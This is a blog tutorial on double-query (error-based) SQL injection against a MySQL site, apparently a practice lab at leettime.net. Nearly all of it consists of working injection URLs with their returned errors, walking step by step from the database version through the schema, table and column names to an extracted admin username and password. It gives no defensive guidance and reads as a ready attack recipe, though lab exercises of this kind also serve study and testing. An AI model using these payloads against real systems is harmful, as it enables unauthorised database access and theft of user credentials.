Home / #SQLANDXSS / #Tutorial / Double Query Based SQL Injection

Double Query Based SQL Injection

Double Query Based SQL Injection :-

Hello everyone once again, Today I am going to show you how " Double Query Based Injection " actually works. Fresh mind is always needed before doing anything and yeah, Presence of mind and passion for the work you wanted to achieve. So let get started.



Lets get the DB_Version

Here Is Our Query:
Version QUERY

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM(SELECT+COUNT(*),CONCAT((SELECT+
(SELECT+CONCAT(CAST(VERSION()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA
.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+
GROUP+BY+x)a)+AND+1=1--+

And the page returns with 

Duplicate entry '5.5.48-cll~1' for key 'group_key'
'5.5.48-cll~1'
This is the version of database
in this injection we must need DB Name
so lets get the DB_NAME

here is our DB query
Database Query
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+
(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)
+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+
LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x
+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1--+

And the page returns with
 Duplicate entry '~'leettime_761wHole'~1' for key 'group_key'
'leettime_761wHole'
this is the name of database
and now we need table names so lets get the table names 

here is our TABLE_NAMES query
Table name QUERY

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'++AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+
(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(table_name+AS+CHAR),0x27,0x7e)+FROM
+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=
0x6c65657474696d655f37363177486f6c65+LIMIT+0,1))+FROM+INFORMATION_SCHEMA.
TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES
+GROUP+BY+x)a)+AND+1=1--+
put database name in hex after the table_schema=0xHEX OF DATABASE NAME

the page returns with 
Duplicate entry '~'testtable1'~1' for key 'group_key'
'testtable1'

this is the table name 
we need sensitive table like
USER, Users, Admin, Tbl_login, Etc. Etc. 
Lets increase our numbers
increase table_schema=0xHEX OF DB NAME limit 0,1))
change 0 with 1
and our limit query will be like this 
limit 1,1))

here is our query 
Table Name Query 2

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'++AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+
(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(table_name+AS+CHAR),0x27,0x7e)+FROM
+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=
0x6c65657474696d655f37363177486f6c65+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.
TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+
GROUP+BY+x)a)+AND+1=1--+
limit 1,1 is the number of tables

and the page returns with
Duplicate entry '~'userlogs'~1' for key 'group_key'
'userlogs'
this is the 2nd table name
keep increasing the numbers untill you get the sensitive table 

Here is our query

Table Name Query 3
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'++AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+
(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(table_name+AS+CHAR),0x27,0x7e)+FROM
+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=
0x6c65657474696d655f37363177486f6c65+LIMIT+2,1))+FROM+INFORMATION_SCHEMA.
TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+
GROUP+BY+x)a)+AND+1=1--+

and the page returns with 
Duplicate entry '~'users'~1' for key 'group_key'
'users'
this is the table name
and this is the sinsitive table lets get the column names now 

here is our query

Column name Query
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+
(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(column_name+AS+CHAR),0x27,0x7e)+FROM
+INFORMATION_SCHEMA.COLUMNS+WHERE+table_schema=
0x6c65657474696d655f37363177486f6c65+AND+table_name=0x7573657273+LIMIT+0,1))+
FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+
INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1--+
put table name in hex after the 
and table_name=0x HeX OF THE TABLE NAME

page returns with
Duplicate entry '~'id'~1' for key 'group_key'
'id' 
this is the 1st column name
lets get the 2nd column name 
increase the number  
"table_name=0xHEX OF TABLE NAME limit 0,1
change the 0 with 1 now our limit query will be like this
limit 1,1

here is our query

Column name Query 2
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+
(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(column_name+AS+CHAR),0x27,0x7e)+FROM+
INFORMATION_SCHEMA.COLUMNS+WHERE+table_schema=
0x6c65657474696d655f37363177486f6c65+AND+table_name=0x7573657273+LIMIT+1,1))+
FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+
INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1--+

and the page returns with
Duplicate entry '~'username'~1' for key 'group_key'
'username'
this is the 2nd column name 
remember the column name it has the USERNAME now we need password column lets increase the number 

here is our query

Column name Query 3
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+
(SELECT+DISTINCT+CONCAT(0x7e,0x27,CAST(column_name+AS+CHAR),0x27,0x7e)+FROM+
INFORMATION_SCHEMA.COLUMNS+WHERE+table_schema=
0x6c65657474696d655f37363177486f6c65+AND+table_name=0x7573657273+LIMIT+2,1))+
FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+
INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1--+

 the page returns with 
'password'
this is the 3rd column name 
BINGO !! we have the 
DB_NAME, TBL_NAME, COL_NAMES
lets extract the data 

here is our query

username Query
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM(SELECT+count(*),CONCAT((SELECT+(SELECT+(SELECT+CONCAT(0x7e,0x27,cast(username+AS+CHAR),0x27,0x7e)+FROM+leettime_761wHole.
users+LIMIT+0,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2
))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1--+
(COLUMN NAME as char)

Here is the column name which is " USERNAME and PASSWORD "
you can increase the number same as you did before

and from DB_NAME which is leettime_761wHole.
and then table name which is USERS so our whole query is

Username Query (Repeat)

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM(SELECT+count(*),CONCAT((SELECT+(SELECT+(SELECT+CONCAT(0x7e,0x27,cast(username+AS+CHAR),0x27,0x7e)+FROM+leettime_761wHole.
users+LIMIT+0,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2
))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1--+

 and the page returns with
'admin'
" This is the username 
you can increase the numbers from db_name.table_name limit 0,1
change the 0 with 1
query will be like this
db_name.table_name limit 1,1 "

lets get the password

our query is

Password Query :-

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'+AND(SELECT+1+FROM(SELECT+count(*),CONCAT((SELECT+(SELECT+
(SELECT+CONCAT(0x7e,0x27,cast(password+AS+CHAR),0x27,0x7e)+FROM+leettime_761wHole.
users+LIMIT+0,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2
))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1--+

and the page returns with

'khan'
is the password, 

Stay Tuned for more tutorials on Different types of SQL Injections... Have a good day folks.

Double Query Based SQL Injection Double Query Based SQL Injection Reviewed by Unknown on 15:25:00 Rating: 5

No comments

Subscribe to: Post Comments (Atom)

Business

[recent]

Follow